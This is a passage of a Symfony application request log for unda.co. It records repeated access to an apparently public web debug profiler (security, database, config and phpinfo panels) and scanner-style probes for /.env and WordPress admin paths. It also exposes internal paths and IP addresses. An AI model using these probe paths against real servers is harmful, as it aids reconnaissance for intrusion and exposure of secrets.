  4709. [2025-12-19 01:07:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4710. [2025-12-19 01:10:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=security","method":"GET"} []
  4711. [2025-12-19 01:10:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4712. [2025-12-19 01:14:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f","method":"GET"} []
  4713. [2025-12-19 01:14:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4714. [2025-12-19 01:15:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemaps.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemaps.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4715. [2025-12-19 01:17:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e17e24","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e17e24","method":"GET"} []
  4716. [2025-12-19 01:17:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4717. [2025-12-19 01:17:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=189.172.134.204&limit=10&url=https%3A%2F%2Fapi.unda.co%2Faddress%2Fac5559db-94bf-49bb-b4bf-9d75cd7022a2%2Finvitation%2F10%2F0%3Forder%3Ddesc","method":"GET"} []
  4718. [2025-12-19 01:17:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=189.172.134.204&limit=10&url=https%3A%2F%2Fapi.unda.co%2Faddress%2Fac5559db-94bf-49bb-b4bf-9d75cd7022a2%2Finvitation%2F10%2F0%3Forder%3Ddesc","method":"GET"} []
  4719. [2025-12-19 01:24:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409","method":"GET"} []
  4720. [2025-12-19 01:24:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4721. [2025-12-19 01:25:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28","method":"GET"} []
  4722. [2025-12-19 01:25:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4723. [2025-12-19 01:27:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8dbb7e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8dbb7e?panel=dump","method":"GET"} []
  4724. [2025-12-19 01:27:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  4725. [2025-12-19 01:28:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4726. [2025-12-19 01:30:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34983a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/34983a?panel=cache","method":"GET"} []
  4727. [2025-12-19 01:30:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4728. [2025-12-19 01:35:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4729. [2025-12-19 01:35:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=cache","method":"GET"} []
  4730. [2025-12-19 01:35:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4731. [2025-12-19 01:35:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4732. [2025-12-19 01:36:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=logger","method":"GET"} []
  4733. [2025-12-19 01:36:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  4734. [2025-12-19 01:38:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"928956","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/928956?panel=time","method":"GET"} []
  4735. [2025-12-19 01:38:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4736. [2025-12-19 01:40:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=form","method":"GET"} []
  4737. [2025-12-19 01:40:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4738. [2025-12-19 01:46:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=config","method":"GET"} []
  4739. [2025-12-19 01:46:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4740. [2025-12-19 01:52:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c78c5b","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c78c5b?panel=request","method":"GET"} []
  4741. [2025-12-19 01:52:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4742. [2025-12-19 01:54:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=exception","method":"GET"} []
  4743. [2025-12-19 01:54:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  4744. [2025-12-19 01:57:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=cache","method":"GET"} []
  4745. [2025-12-19 01:57:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4746. [2025-12-19 01:58:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ad59","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/00ad59?panel=time","method":"GET"} []
  4747. [2025-12-19 01:58:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4748. [2025-12-19 01:59:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"497d02","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/497d02?panel=validator","method":"GET"} []
  4749. [2025-12-19 01:59:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  4750. [2025-12-19 02:02:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4751. [2025-12-19 02:07:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc","method":"GET"} []
  4752. [2025-12-19 02:07:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4753. [2025-12-19 02:08:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ba01a","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4ba01a?panel=config","method":"GET"} []
  4754. [2025-12-19 02:08:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4755. [2025-12-19 02:10:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=form","method":"GET"} []
  4756. [2025-12-19 02:10:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4757. [2025-12-19 02:12:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=time","method":"GET"} []
  4758. [2025-12-19 02:12:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4759. [2025-12-19 02:13:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4760. [2025-12-19 02:13:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  4761. [2025-12-19 02:15:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f721d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5f721d?panel=time","method":"GET"} []
  4762. [2025-12-19 02:15:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4763. [2025-12-19 02:17:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=twig","method":"GET"} []
  4764. [2025-12-19 02:17:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4765. [2025-12-19 02:20:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bb3b91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/bb3b91?panel=db","method":"GET"} []
  4766. [2025-12-19 02:20:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  4767. [2025-12-19 02:21:16] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  4768. [2025-12-19 02:21:26] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"a70931","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/a70931","method":"GET"} []
  4769. [2025-12-19 02:23:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a2a520?group=1&panel=db","method":"GET"} []
  4770. [2025-12-19 02:23:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  4771. [2025-12-19 02:25:14] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  4772. [2025-12-19 02:26:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-json" (from "http://auth.unda.co/wp-json")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-json\" (from \"http://auth.unda.co/wp-json\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4773. [2025-12-19 02:26:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=time","method":"GET"} []
  4774. [2025-12-19 02:26:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4775. [2025-12-19 02:30:46] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  4776. [2025-12-19 02:36:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=security","method":"GET"} []
  4777. [2025-12-19 02:36:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4778. [2025-12-19 02:37:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=162.243.172.59&limit=10","method":"GET"} []
  4779. [2025-12-19 02:37:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=162.243.172.59&limit=10","method":"GET"} []
  4780. [2025-12-19 02:40:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=db","method":"GET"} []
  4781. [2025-12-19 02:40:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  4782. [2025-12-19 02:40:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4783. [2025-12-19 02:40:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4784. [2025-12-19 02:40:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4785. [2025-12-19 02:40:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4786. [2025-12-19 02:40:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4787. [2025-12-19 02:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4788. [2025-12-19 02:41:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4789. [2025-12-19 02:41:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
